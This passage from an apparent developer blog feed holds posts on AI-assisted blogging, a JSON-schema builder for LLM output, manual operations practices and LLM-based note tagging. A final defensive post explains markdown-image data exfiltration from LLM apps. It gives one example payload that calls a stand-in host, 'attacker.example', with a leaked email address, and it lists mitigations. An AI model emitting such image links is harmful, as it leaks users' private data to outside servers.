&lt;h2&gt;Co-creation with AI: A New Era of Blogging&lt;/h2&gt;
&lt;p&gt;There&apos;s no need to reject the use of AI as a tool for output. The crucial aspect is &lt;strong&gt;how we choose to curate and edit the information&lt;/strong&gt;. This process is driven by our individual experiences, knowledge, and perspectives, stored within our neural networks – something AI cannot replicate.&lt;/p&gt;
&lt;p&gt;Generative AI can be seen as a tool to augment our abilities and accelerate our creative process. By viewing generative AI not as a technology that disrupts us, but as a &lt;strong&gt;partner that enhances our creativity&lt;/strong&gt;, we can unlock new possibilities for blog writing.&lt;/p&gt;
&lt;p&gt;Through Human-in-the-Loop interactions, where humans and LLMs engage in a creative dialogue, we can craft more unique and engaging blog posts. For instance, we can leverage LLMs to summarize information, suggest article structures, and streamline the writing process, ultimately leading to higher-quality output.&lt;/p&gt;
&lt;h2&gt;The Evolving Value of Blogs&lt;/h2&gt;
&lt;p&gt;So, what specific value can we find in blogging today?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Personal Branding&lt;/strong&gt;: Clarifying your expertise and values and sharing them with others can enhance your professional performance.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Sharing Extrapolative Thoughts&lt;/strong&gt;: Blogs can serve as a platform for expressing intuitive insights and creative ideas that go beyond what generative AI produces even at high temperature settings.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Accelerating Creative Output&lt;/strong&gt;: By embracing generative AI as a tool for augmenting our abilities, we can leverage &lt;a href=&quot;https://en.wikipedia.org/wiki/Human-in-the-loop&quot;&gt;Human-in-the-Loop&lt;/a&gt; interactions with LLMs to create distinctive and captivating blog posts.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;The advancements in generative AI are remarkable, and they hold the potential to replace human activities in various fields. However, blogging retains its inherent value as a &lt;strong&gt;platform for human expression and creativity&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;By utilizing generative AI as a tool to organize and articulate our thoughts, we can unlock new possibilities and continue to find meaning in the art of blogging.&lt;/p&gt;
</content:encoded></item><item><title>Developing a Web UI for Controlling LLM JSON Output</title><link>https://ainoya.dev/posts/llm-json-output-format-gen/</link><guid isPermaLink="true">https://ainoya.dev/posts/llm-json-output-format-gen/</guid><description>Building a user-friendly Web UI to easily structure and control LLM outputs in JSON format for better integration with applications.</description><pubDate>Sun, 01 Sep 2024 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Developing a Web UI for Controlling LLM JSON Output&lt;/h2&gt;
&lt;h3&gt;Introduction&lt;/h3&gt;
&lt;p&gt;Controlling LLM (Large Language Model) output to get the desired results often requires meticulous specification of output formats and content. This is especially crucial when integrating LLM outputs into other systems, where JSON format control becomes essential.&lt;/p&gt;
&lt;p&gt;While Gemini and OpenAI APIs allow specifying JSON schema as output options, existing JSON schema builders often have a steep learning curve due to their ability to handle all possible structures. This article introduces a Web UI that simplifies the process by applying constraints to the JSON schema output format, enabling intuitive schema building through a user-friendly GUI.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://ainoya.github.io/llm-output-format-gen/?items=%5B%7B%22key%22%3A%22summary%22%2C%22type%22%3A%22text%22%2C%22description%22%3A%22summarize+following+text.%22%7D%2C%7B%22key%22%3A%22tags%22%2C%22type%22%3A%22multipleSelect%22%2C%22description%22%3A%22Topics+of+following+text.%22%2C%22options%22%3A%5B%22sport%22%2C%22technology%22%5D%7D%5D&amp;amp;topLevelKey=result&quot;&gt;JSON Schema generator for LLM JSON formatted output&lt;/a&gt;&lt;/p&gt;
&lt;h3&gt;OpenAI&apos;s JSON Schema Option&lt;/h3&gt;
&lt;p&gt;Many LLM APIs, including OpenAI&apos;s, offer JSON schema options to control output in JSON format. JSON schema is a format for defining the structure of JSON data, using keywords like &lt;code&gt;type&lt;/code&gt;, &lt;code&gt;properties&lt;/code&gt;, and &lt;code&gt;required&lt;/code&gt; to specify data types, properties, and mandatory fields.&lt;/p&gt;
&lt;p&gt;For instance, you can specify the following JSON schema to output information about a person, including their name and age, in JSON format:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{
  &quot;type&quot;: &quot;object&quot;,
  &quot;properties&quot;: {
    &quot;name&quot;: {
      &quot;type&quot;: &quot;string&quot;
    },
    &quot;age&quot;: {
      &quot;type&quot;: &quot;integer&quot;
    }
  },
  &quot;required&quot;: [&quot;name&quot;, &quot;age&quot;]
}
&lt;/code&gt;&lt;/pre&gt;
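&lt;p&gt;Even with a schema in the prompt, the model&apos;s reply is still worth validating before it reaches downstream code. A minimal sketch of that consuming side, hand-rolling just the &lt;code&gt;required&lt;/code&gt; check for the schema above (a real project would use a full JSON-schema validator library):&lt;/p&gt;

```typescript
// Parse an LLM reply and check it against the schema's required fields
// before using it downstream. Hand-rolled for illustration only; a real
// project would use a full JSON-schema validator.
const personSchema = {
  type: "object",
  properties: { name: { type: "string" }, age: { type: "integer" } },
  required: ["name", "age"],
};

function parsePerson(raw: string): { name: string; age: number } {
  const parsed = JSON.parse(raw);
  for (const key of personSchema.required) {
    if (!(key in parsed)) {
      throw new Error("missing required field: " + key);
    }
  }
  return parsed;
}
```

&lt;p&gt;Failing fast here turns a malformed model reply into a clear error instead of a silent downstream bug.&lt;/p&gt;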
&lt;p&gt;However, manually writing JSON schema can be quite tedious, especially when dealing with complex data structures.&lt;/p&gt;
&lt;h3&gt;Building JSON Schema with a Web UI&lt;/h3&gt;
&lt;p&gt;The developed Web UI, implemented using React, features a GUI that allows for intuitive JSON schema building through drag-and-drop operations. Users can easily create a JSON schema by arranging the necessary elements on the GUI and configuring their properties.&lt;/p&gt;
&lt;h3&gt;Benefits of the Web UI&lt;/h3&gt;
&lt;p&gt;This Web UI offers several advantages:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Schema Definition without LLM:&lt;/strong&gt; No need to rely on LLMs for schema generation; developers can design schemas according to their specific needs.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Intuitive Schema Building:&lt;/strong&gt; The GUI-based operation simplifies schema building, even for users unfamiliar with JSON schema.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Easy Adjustments:&lt;/strong&gt; The schema can be easily edited on the GUI, allowing for quick adjustments and modifications.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Support for Multiple LLMs:&lt;/strong&gt;  Compatible with JSON schema options for various LLMs, including OpenAI and Gemini.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Schema Sharing:&lt;/strong&gt;  Created schemas can be shared easily via URL.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Web UI Use Cases&lt;/h3&gt;
&lt;p&gt;The Web UI can be applied to various use cases. Here are a few examples:&lt;/p&gt;
&lt;p&gt;You can freely experiment with the UI at &lt;a href=&quot;https://ainoya.github.io/llm-output-format-gen&quot;&gt;https://ainoya.github.io/llm-output-format-gen&lt;/a&gt;.  NOTE:  Operations are implemented only on the front-end to prevent sending and recording data to the server.&lt;/p&gt;
&lt;p&gt;Let&apos;s consider a task that involves summarizing an article and simultaneously assigning topics to classify it. We&apos;ll define the JSON output structure using the GUI.&lt;/p&gt;
&lt;p&gt;You can configure three output types:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;Text&lt;/code&gt;: Text format, used for outputting summaries, for example.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Single Select&lt;/code&gt;: Single selection format, used for classifying content, for example.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Multi Select&lt;/code&gt;: Multiple selection format, used for assigning topics, for example.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The following screenshot shows an example:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://ainoya.dev/posts/llm-json-output-format-gen/images/schemadefinition.png&quot; alt=&quot;schema definition&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Clicking the &lt;code&gt;Generate Schema&lt;/code&gt; button outputs the JSON schema:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://ainoya.dev/posts/llm-json-output-format-gen/images/generatedschema.png&quot; alt=&quot;generate schema&quot; /&gt;&lt;/p&gt;
&lt;p&gt;Copy the schema to the clipboard using &lt;code&gt;Copy to clipboard&lt;/code&gt; and let&apos;s create a prompt.&lt;/p&gt;
&lt;p&gt;Prompt example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Please read the text and output a response following the JSON schema below:

# Text

&amp;lt;Text&amp;gt;
...copy and paste from an article in https://ainoya-dev.pages.dev/posts/llm-application-security-practice-markdown-img-tag/
&amp;lt;/Text&amp;gt;

# Output Schema

```json
{
  &quot;type&quot;: &quot;object&quot;,
  &quot;additionalProperties&quot;: false,
  &quot;properties&quot;: {
    &quot;result&quot;: {
      &quot;type&quot;: &quot;object&quot;,
      &quot;additionalProperties&quot;: false,
      &quot;properties&quot;: {
        &quot;items&quot;: {
          &quot;type&quot;: &quot;array&quot;,
          &quot;additionalProperties&quot;: false,
          &quot;items&quot;: {
            &quot;oneOf&quot;: [
              {
                &quot;type&quot;: &quot;object&quot;,
                &quot;additionalProperties&quot;: false,
                &quot;properties&quot;: {
                  &quot;type&quot;: {
                    &quot;const&quot;: &quot;text&quot;
                  },
                  &quot;key&quot;: {
                    &quot;const&quot;: &quot;summary&quot;
                  },
                  &quot;description&quot;: {
                    &quot;const&quot;: &quot;summarize following text.&quot;
                  },
                  &quot;payload&quot;: {
                    &quot;type&quot;: &quot;object&quot;,
                    &quot;properties&quot;: {
                      &quot;value&quot;: {
                        &quot;type&quot;: &quot;string&quot;
                      }
                    },
                    &quot;required&quot;: [
                      &quot;value&quot;
                    ]
                  }
                },
                &quot;required&quot;: [
                  &quot;type&quot;,
                  &quot;key&quot;,
                  &quot;description&quot;,
                  &quot;payload&quot;
                ]
              },
              {
                &quot;type&quot;: &quot;object&quot;,
                &quot;additionalProperties&quot;: false,
                &quot;properties&quot;: {
                  &quot;type&quot;: {
                    &quot;const&quot;: &quot;multipleSelect&quot;
                  },
                  &quot;key&quot;: {
                    &quot;const&quot;: &quot;tags&quot;
                  },
                  &quot;description&quot;: {
                    &quot;const&quot;: &quot;Topics of following text.&quot;
                  },
                  &quot;payload&quot;: {
                    &quot;type&quot;: &quot;object&quot;,
                    &quot;properties&quot;: {
                      &quot;value&quot;: {
                        &quot;type&quot;: &quot;array&quot;,
                        &quot;items&quot;: {
                          &quot;type&quot;: &quot;string&quot;,
                          &quot;enum&quot;: [
                            &quot;sport&quot;,
                            &quot;technology&quot;
                          ]
                        }
                      }
                    },
                    &quot;required&quot;: [
                      &quot;value&quot;
                    ]
                  }
                },
                &quot;required&quot;: [
                  &quot;type&quot;,
                  &quot;key&quot;,
                  &quot;description&quot;,
                  &quot;payload&quot;
                ]
              }
            ]
          }
        }
      },
      &quot;required&quot;: [
        &quot;items&quot;
      ]
    }
  },
  &quot;required&quot;: [
    &quot;result&quot;
  ]
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;With GPT-4, this prompt generates the following result, formatted for use with the &lt;a href=&quot;https://en.wikipedia.org/wiki/Entity%E2%80%93attribute%E2%80%93value_model&quot;&gt;EAV pattern&lt;/a&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{
  &quot;result&quot;: {
    &quot;items&quot;: [
      {
        &quot;type&quot;: &quot;text&quot;,
        &quot;key&quot;: &quot;summary&quot;,
        &quot;description&quot;: &quot;summarize following text.&quot;,
        &quot;payload&quot;: {
          &quot;value&quot;: &quot;The article discusses the potential security risks of rendering markdown images in LLM (Large Language Model) applications. It highlights how embedding images using markdown can expose sensitive data through image URLs, which may be exploited by malicious actors. The article provides methods to mitigate these risks, such as disabling image embedding entirely or whitelisting trusted hosts. Example TypeScript code is provided to demonstrate these approaches. The importance of implementing robust security measures, especially in applications dealing with user-generated content (UGC), is emphasized.&quot;
        }
      },
      {
        &quot;type&quot;: &quot;multipleSelect&quot;,
        &quot;key&quot;: &quot;tags&quot;,
        &quot;description&quot;: &quot;Topics of following text.&quot;,
        &quot;payload&quot;: {
          &quot;value&quot;: [&quot;technology&quot;]
        }
      }
    ]
  }
}
&lt;/code&gt;&lt;/pre&gt;
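&lt;p&gt;Because each item in the result carries its own &lt;code&gt;type&lt;/code&gt;, &lt;code&gt;key&lt;/code&gt;, and &lt;code&gt;payload&lt;/code&gt;, the EAV-style output is easy to flatten into a plain key-to-value record before handing it to other systems. Here is a minimal TypeScript sketch; the type and function names are mine, not part of the tool:&lt;/p&gt;

```typescript
// Shape of one EAV-style item returned by the model (mirrors the schema above)
interface EavItem {
  type: string;
  key: string;
  description: string;
  payload: { value: string | string[] };
}

// Flatten the items array into a plain key-to-value record
function flattenResult(response: { result: { items: EavItem[] } }) {
  const out: { [key: string]: string | string[] } = {};
  for (const item of response.result.items) {
    out[item.key] = item.payload.value;
  }
  return out;
}
```

&lt;p&gt;Applied to the response above, this yields an object with a &lt;code&gt;summary&lt;/code&gt; string and a &lt;code&gt;tags&lt;/code&gt; array.&lt;/p&gt;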
&lt;p&gt;The definition used in this example can be shared as a URL using the &lt;code&gt;Share URL&lt;/code&gt; feature. Here&apos;s the &lt;a href=&quot;https://ainoya.github.io/llm-output-format-gen/?items=%5B%7B%22key%22%3A%22summary%22%2C%22type%22%3A%22text%22%2C%22description%22%3A%22summarize+following+text.%22%7D%2C%7B%22key%22%3A%22tags%22%2C%22type%22%3A%22multipleSelect%22%2C%22description%22%3A%22Topics+of+following+text.%22%2C%22options%22%3A%5B%22sport%22%2C%22technology%22%5D%7D%5D&amp;amp;topLevelKey=result&quot;&gt;URL&lt;/a&gt; for the schema shown in the example.&lt;/p&gt;
&lt;h2&gt;Future Development&lt;/h2&gt;
&lt;p&gt;The Web UI is still under development, and the following tasks remain:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Support for OpenAI&apos;s Structured Outputs:&lt;/strong&gt; The UI cannot yet generate schemas tailored to OpenAI&apos;s &lt;a href=&quot;https://platform.openai.com/docs/guides/structured-outputs&quot;&gt;Structured Outputs&lt;/a&gt;, because Structured Outputs does not accept the &lt;code&gt;oneOf&lt;/code&gt; keyword used in the generated JSON schemas. The schema-specification option for &lt;a href=&quot;https://cloud.google.com/vertex-ai/generative-ai/docs/multimodal/control-generated-output?hl=en&quot;&gt;Gemini (Vertex AI)&lt;/a&gt; is likewise unsupported. For now, the API options can only enforce generic JSON output; the generated schema must be pasted directly into the prompt.&lt;/p&gt;
&lt;h2&gt;Caveats&lt;/h2&gt;
&lt;p&gt;There are reports that forcing LLMs to produce complex JSON or structured outputs can degrade output quality. In my own testing on simple tasks, however, any degradation was minimal.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://arxiv.org/abs/2408.02442v1&quot;&gt;[2408.02442v1] Let Me Speak Freely? A Study on the Impact of Format Restrictions on Performance of Large Language Models&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://aider.chat/2024/08/14/code-in-json.html&quot;&gt;LLMs are bad at returning code in JSON | aider&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;This article introduced a Web UI for building JSON schemas that constrain LLM output. It simplifies controlling LLM responses in JSON format, making them easier to integrate into other systems.&lt;/p&gt;
&lt;h2&gt;References&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://ainoya.github.io/llm-output-format-gen/?items=%5B%7B%22key%22%3A%22summary%22%2C%22type%22%3A%22text%22%2C%22description%22%3A%22summarize+following+text.%22%7D%2C%7B%22key%22%3A%22tags%22%2C%22type%22%3A%22multipleSelect%22%2C%22description%22%3A%22Topics+of+following+text.%22%2C%22options%22%3A%5B%22sport%22%2C%22technology%22%5D%7D%5D&amp;amp;topLevelKey=result&quot;&gt;JSON Schema generator for LLM JSON formatted output&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/ainoya/llm-output-format-gen&quot;&gt;ainoya/llm-output-format-gen&lt;/a&gt;: Source code&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://bjdash.github.io/JSON-Schema-Builder/&quot;&gt;JSON Schema Builder&lt;/a&gt;: This is very useful for building various JSON schemas&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://platform.openai.com/docs/guides/structured-outputs&quot;&gt;Structured Outputs - OpenAI API&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://cloud.google.com/vertex-ai/generative-ai/docs/multimodal/control-generated-output?hl=en&quot;&gt;Control generated output  |  Generative AI on Vertex AI  |  Google Cloud&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item><item><title>Day 0 Operations: Minimizing Risks in Manual Processes for New Products</title><link>https://ainoya.dev/posts/day-0-web-ops/</link><guid isPermaLink="true">https://ainoya.dev/posts/day-0-web-ops/</guid><description>Learn how to minimize risks when manually operating new products before full automation is in place. This post discusses key principles and practical examples to ensure smooth and reliable operations from day one.</description><pubDate>Sat, 31 Aug 2024 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;It&apos;s become standard practice to automate and codify product operations. When launching a new product, you&apos;re often starting from scratch with these automation efforts.&lt;/p&gt;
&lt;p&gt;While external services have made setting up environments significantly more efficient, achieving perfect automation from the outset can be challenging for many products. It&apos;s more common to build the environment and continuously reduce toil as the product develops.&lt;/p&gt;
&lt;p&gt;This inevitably involves manual processes. While it&apos;s acceptable to perform tasks manually with the intention of automating them later, are we underestimating the risks associated with these manual operations? Consider deployments, data migrations, data changes during incident response, and data investigations.&lt;/p&gt;
&lt;p&gt;As Heinrich&apos;s Law suggests, overlooking small risks can lead to significant problems down the line. Certain precautions should be taken when performing manual tasks. Just because a process isn&apos;t automated doesn&apos;t mean we should approach risky operations like data queries with creative, on-the-spot solutions. This can be dangerous.&lt;/p&gt;
&lt;h2&gt;Key Principles for Manual Operations&lt;/h2&gt;
&lt;p&gt;Here are some key principles to keep in mind:&lt;/p&gt;
&lt;h3&gt;1. The Principle of Least Astonishment&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Avoid surprising your team with unexpected information when performing tasks or communicating updates (happy surprises excluded!).&lt;/li&gt;
&lt;li&gt;Surprises often indicate a lack of awareness beforehand, meaning someone who should have been informed wasn&apos;t. Ensure transparency within the team so that all operations are predictable. Teamwork relies on shared understanding.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;2. Document Everything&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Before the Operation:&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Create detailed procedures based on anticipated steps.&lt;/li&gt;
&lt;li&gt;Conduct team reviews of these procedures to identify gaps or omissions.&lt;/li&gt;
&lt;li&gt;On the day of the operation, simply follow the documented steps mechanically. This reduces psychological burden and promotes safe execution.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Rehearsal:&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Depending on the importance of the operation, conduct a dry run without making actual changes.&lt;/li&gt;
&lt;li&gt;Execute commands with dry-run options enabled or run read-only queries to simulate the process.&lt;/li&gt;
&lt;li&gt;Even well-written documentation can reveal unexpected errors or missing steps during a dry run.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;During the Operation:&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Comment and record each step and its outcome. This helps prevent secondary damage caused by panicked, undocumented commands during incident response.&lt;/li&gt;
&lt;li&gt;Communicate with your team before and during the operation. Avoid silent execution, especially when multiple team members are making changes, as the combined outcome can be unpredictable.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Verification:&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;For pull requests, document manual testing performed, especially for cases where unit tests are difficult to write due to limitations in the testing environment. For UI testing, capture videos or screenshots.&lt;/li&gt;
&lt;li&gt;This helps with post-incident analysis, making it easier to identify testing gaps and determine necessary test cases or implementation improvements to prevent recurrence.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;Benefits of Documentation&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Short-term:&lt;/strong&gt;  Standardize common procedures through documented templates.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Long-term:&lt;/strong&gt;  Provide requirements for future automation efforts. Analyze and categorize documented tasks to prioritize automation initiatives.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;3. Generate Meaningful Logs&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Go beyond generic error messages. Strive for logs that provide insights into the issue.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Bad Log:&lt;/strong&gt; &quot;An error occurred.&quot; This doesn&apos;t offer any helpful information beyond the fact that an exception was thrown.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Good Log:&lt;/strong&gt; &quot;Data synchronization error with Service A: Service A API is temporarily unavailable. Failed values: value1, value2, value3.&quot; This log clearly explains the problem, reducing the need to dig into the code. It also identifies the specific values that caused the failure.&lt;/li&gt;
&lt;/ul&gt;
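&lt;p&gt;The &quot;good log&quot; above amounts to including the operation, the cause, and the failing values in the message itself. A small TypeScript sketch of the idea (the function name is illustrative):&lt;/p&gt;

```typescript
// Compose an error message that names the operation, the cause, and the failing
// values, so the log can be understood without digging into the code
function buildSyncErrorMessage(service: string, cause: string, failedValues: string[]) {
  return (
    "Data synchronization error with " + service + ": " + cause +
    ". Failed values: " + failedValues.join(", ") + "."
  );
}
```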
&lt;h2&gt;Practical Examples&lt;/h2&gt;
&lt;h3&gt;Release (Deployment)&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;If deployments occur on a fixed schedule, hold a release planning meeting with the team beforehand. Use this opportunity to align everyone on the upcoming activities. Consider using a tool like Notion to automatically create a release plan document.&lt;/li&gt;
&lt;li&gt;Include the following in the template:
&lt;ul&gt;
&lt;li&gt;Release Date and Time&lt;/li&gt;
&lt;li&gt;Release Engineer&lt;/li&gt;
&lt;li&gt;Release Scope&lt;/li&gt;
&lt;li&gt;Data Migration (Yes/No)
&lt;ul&gt;
&lt;li&gt;Details of planned queries and their potential impact on production system performance.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Post-Release Verification Steps&lt;/li&gt;
&lt;li&gt;Rollback Procedures&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Data Modification&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Treat production data changes with extreme caution. Implement query reviews for RDBMS systems.&lt;/li&gt;
&lt;li&gt;Maintain a record of executed queries along with their results. While transaction logs and binary logs can provide this information retrospectively, having readily available query results simplifies root cause analysis in case of secondary issues.&lt;/li&gt;
&lt;li&gt;Consider using a template like this:
&lt;ul&gt;
&lt;li&gt;Purpose and Summary of the Change&lt;/li&gt;
&lt;li&gt;Planned Query&lt;/li&gt;
&lt;li&gt;Pre-Execution Verification Query and Results&lt;/li&gt;
&lt;li&gt;Post-Execution Verification Query and Results&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;This post explored strategies for managing manual operations in the early stages of a web service&apos;s lifecycle, before full automation is achieved. The core principles to embrace are: 1. the Principle of Least Astonishment, 2. documenting everything, and 3. generating meaningful logs.&lt;/p&gt;
&lt;p&gt;In the future, AI agents might handle these manual tasks. The principles discussed here can serve as guidelines for designing and training these agents, ensuring they operate reliably and predictably.&lt;/p&gt;
</content:encoded></item><item><title>Automating My Note Tagging with LLMs</title><link>https://ainoya.dev/posts/auto-document-tag-with-vertex-ai-json-schema/</link><guid isPermaLink="true">https://ainoya.dev/posts/auto-document-tag-with-vertex-ai-json-schema/</guid><description>Tired of manually tagging my notes, I decided to automate the process using Large Language Models (LLMs). This post explores my journey and the solution I implemented using Vertex AI.</description><pubDate>Sun, 25 Aug 2024 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;I&apos;ve been using tags to organize and connect my notes locally.  This has been especially helpful when navigating related information within &lt;a href=&quot;/posts/distilled-pocket-article-to-obsidian/&quot;&gt;Obsidian&lt;/a&gt;. While tagging has been useful, it&apos;s also been a manual and tedious process.  I previously considered using morphological analysis to extract keywords as tags, but the results were often noisy and didn&apos;t capture the core meaning of my notes.&lt;/p&gt;
&lt;p&gt;Recently, I started experimenting with LLMs to see if they could help.  My idea was to feed my notes into an LLM and use prompts to extract the most important topics, which could then be used as tags.  The results were promising!&lt;/p&gt;
&lt;p&gt;I implemented this solution in my &lt;a href=&quot;https://github.com/ainoya/PocketMD/blob/main/src/append_tags.ts#L103&quot;&gt;PocketMD project&lt;/a&gt;, leveraging Vertex AI to generate tags and append them to the frontmatter of my notes.  Both Vertex AI and Gemini offer the ability to specify the output format using JSON and schemas.  However, I found that this option is only available with Gemini Pro and not Gemini Flash. Here&apos;s an example of the schema definition:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  import {
    FunctionDeclarationSchemaType,
    ResponseSchema,
  } from &quot;@google-cloud/vertexai&quot;;

  const schema: ResponseSchema = {
    type: FunctionDeclarationSchemaType.OBJECT,
    properties: {
      tags: {
        // string array
        type: FunctionDeclarationSchemaType.ARRAY,
        // @ts-ignore
        items: {
          type: FunctionDeclarationSchemaType.STRING,
        },
      },
    },
  };
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I encountered an error when trying to add a type to the array elements using the TypeScript types provided by &lt;code&gt;@google-cloud/vertexai&lt;/code&gt;. I had to use &lt;code&gt;@ts-ignore&lt;/code&gt; as a temporary workaround.&lt;/p&gt;
&lt;p&gt;It&apos;s worth noting that advanced JSON schema features like &lt;code&gt;allOf&lt;/code&gt; and &lt;code&gt;oneOf&lt;/code&gt; did not pass API validation with either Vertex AI or OpenAI&apos;s Structured Outputs (as of August 25, 2024).&lt;/p&gt;
&lt;p&gt;While the LLM generally adhered to the specified output format, I still needed to refine the values using prompts. For instance, even when specifying that tags should start with a hashtag, the LLM occasionally missed this or added extra double quotes.  I ended up using regular expressions to clean up the generated output.&lt;/p&gt;
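&lt;p&gt;The cleanup can be as simple as trimming stray quotes and normalizing the leading hashtag. A sketch of the idea (not the exact code used in PocketMD):&lt;/p&gt;

```typescript
// Normalize an LLM-generated tag: trim whitespace, strip stray surrounding quotes,
// and ensure exactly one leading hashtag
function normalizeTag(raw: string) {
  const stripped = raw.trim().replace(/^["']+|["']+$/g, "").replace(/^#+/, "");
  return "#" + stripped;
}
```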
&lt;p&gt;This implementation has significantly improved my workflow.  I can now automatically tag both new and existing notes with a simple script, making it much easier to connect ideas and revisit past information.  This has been a game-changer for organizing my thoughts and staying on top of my ever-growing collection of notes.&lt;/p&gt;
&lt;h2&gt;References&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://platform.openai.com/docs/guides/structured-outputs/how-to-use&quot;&gt;Structured Outputs - OpenAI API&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://cloud.google.com/vertex-ai/generative-ai/docs/multimodal/control-generated-output?hl=en#generativeaionvertexai_gemini_controlled_generation_response_schema_2-python&quot;&gt;Control generated output  |  Generative AI on Vertex AI  |  Google Cloud&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item><item><title>LLM Application Security Practice: Markdown Image Tag</title><link>https://ainoya.dev/posts/llm-application-security-practice-markdown-img-tag/</link><guid isPermaLink="true">https://ainoya.dev/posts/llm-application-security-practice-markdown-img-tag/</guid><description>Learn how seemingly harmless markdown image rendering in your LLM application can lead to user data leakage and how to mitigate this security risk.</description><pubDate>Sat, 03 Aug 2024 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Rendering Markdown Images in LLM Apps? Proceed with Caution&lt;/h2&gt;
&lt;p&gt;It&apos;s a common practice to render markdown-formatted text into HTML for user responses in LLM applications. Markdown&apos;s image embedding syntax, &lt;code&gt;![image alt text](image url)&lt;/code&gt;, seamlessly integrates images into the HTML output. But this convenience hides a security pitfall.&lt;/p&gt;
&lt;p&gt;When an image is rendered in HTML, the browser accesses its URL.  This opens up a subtle attack vector:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Malicious actors can craft URLs with embedded parameters containing sensitive user context or personal information.&lt;/li&gt;
&lt;li&gt;When the browser fetches the image, this data leaks to the external server via the URL parameters, potentially ending up in server logs or worse.&lt;/li&gt;
&lt;/ul&gt;
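&lt;p&gt;Concretely, the exfiltration payload is just an ordinary-looking image whose URL smuggles data out through its query string (the domain below is a hypothetical attacker host):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;![chart](https://attacker.example/pixel.png?leak=alice%40example.com)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The moment the image renders, the browser requests this URL and the data lands in the attacker&apos;s access logs.&lt;/p&gt;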
&lt;h2&gt;How to Mitigate the Risk&lt;/h2&gt;
&lt;p&gt;Fortunately, there are several ways to prevent this type of data leakage:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Disable Markdown Image Embedding:&lt;/strong&gt;  The most straightforward approach is to entirely disable the image embedding functionality within your markdown parser.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Implement a Whitelist:&lt;/strong&gt;  Allow images to be embedded only from trusted domains by creating a whitelist of allowed hosts.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
